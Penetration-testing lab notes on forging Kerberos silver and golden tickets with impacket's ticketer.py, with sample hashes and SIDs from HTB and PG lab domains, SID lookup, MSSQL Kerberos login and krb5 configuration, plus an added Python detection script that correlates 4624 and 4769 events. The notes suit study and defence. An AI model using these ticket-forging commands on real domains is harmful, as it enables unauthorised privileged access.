Usually we will have SeImpersonatePrivilege after getting a shell through xp_cmdshell and can use a potato attack. Sometimes the intended path is enumerating the database instead.
Refer to PG Practice Nagoya and Escape from HTB. Just because the ticket is generated does not mean it works. Check the domain in the SPN:
This is what we are going to use for the silver ticket. If the credentials were acquired from Kerberoasting, check the GetUserSPNs.py output for the SPN.
General syntax:
ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
Without an SPN, a golden ticket is created:
ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb administrator
With an SPN specified we get a ticket for a specific service:
We can use a fake user as well.
ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -spn TotesLegit/dc.sequel.htb administrator
To list existing SPNs:
Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName | Select-Object ServicePrincipalName
Example of getting the silver ticket for a specific service:
ticketer.py -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com Administrator
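As an added defender-side example (not part of these notes or of impacket): because a forged service ticket never goes through the KDC, one detection heuristic is a Kerberos network logon (4624) on a server with no matching 4769 TGS request on any domain controller. Host names, accounts and times below are constructed.

```python
# Added defender-side example (not from the original notes). A forged service
# ticket is never requested from the KDC, so the domain controller records no
# 4769 (TGS request) for it, while the target host still records a 4624 logon
# with AuthenticationPackageName=Kerberos. This correlates the two.
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass
class Event:
    event_id: int     # 4624 (logon) or 4769 (TGS request)
    time: datetime
    user: str         # TargetUserName; 4769 usually carries user@REALM
    host: str         # computer that logged the event
    detail: str       # 4624: AuthenticationPackageName, 4769: ServiceName

def _account(name):
    # normalise "Administrator@SEQUEL.HTB" and "administrator" to the same key
    return name.split("@")[0].lower()

def find_logons_without_tgs(events, window=timedelta(minutes=10)):
    """Return (user, host, time) for Kerberos 4624 logons that have no 4769
    from the same account on any DC within `window` before the logon."""
    tgs = [e for e in events if e.event_id == 4769]
    flagged = []
    for e in events:
        if e.event_id != 4624 or e.detail.lower() != "kerberos":
            continue
        explained = any(
            _account(t.user) == _account(e.user)
            and timedelta(0) <= e.time - t.time <= window
            for t in tgs
        )
        if not explained:
            flagged.append((e.user, e.host, e.time))
    return flagged

# Constructed sample records (hypothetical hosts and times, not real log data).
T0 = datetime(2024, 1, 1, 10, 0)
SAMPLE_EVENTS = [
    Event(4769, T0, "jdoe@SEQUEL.HTB", "DC1", "MSSQLSvc/dc.sequel.htb"),
    Event(4624, T0 + timedelta(minutes=1), "jdoe", "SQL01", "Kerberos"),           # legit
    Event(4624, T0 + timedelta(minutes=5), "administrator", "SQL01", "Kerberos"),  # no 4769
    Event(4624, T0 + timedelta(minutes=6), "svc_backup", "SQL01", "NTLM"),         # ignored
]

if __name__ == "__main__":
    for user, host, when in find_logons_without_tgs(SAMPLE_EVENTS):
        print(f"{when:%H:%M} {host}: Kerberos logon for {user} with no TGS request at a DC")
```

In production the window must cover the service ticket lifetime (tickets are cached and reused) and 4769 events from every DC have to be collected, or legitimate logons will be flagged.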
Get SID
To get the domain SID:
nxc ldap DC1.scrm.local -u <user> -p <pass> -k --get-sid
or
lookupsid.py test.local/john:password123@10.10.10.1
or
python3 getPac.py -targetUser administrator domain/user:pass
Now use the domain SID. This can also be done with LDAP.
MSSQL
KRB5CCNAME=administrator.ccache mssqlclient.py -k Administrator@dc.sequel.htb
Just press Enter for an empty password. It is normal to get a user such as svc_mssql or similar when xp_cmdshell whoami is run.
export KRB5CCNAME=administrator.ccache
Check that the ticket is present with klist.
Then edit /etc/krb5user.conf
Example:
[libdefaults]
default_realm = NAGOYA-INDUSTRIES.COM
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
dns_canonicalize_hostname = false
fcc-mit-ticketflags = true
[realms]
NAGOYA-INDUSTRIES.COM = {
kdc = nagoya.nagoya-industries.com
}
[domain_realm]
.nagoya-industries.com = NAGOYA-INDUSTRIES.COM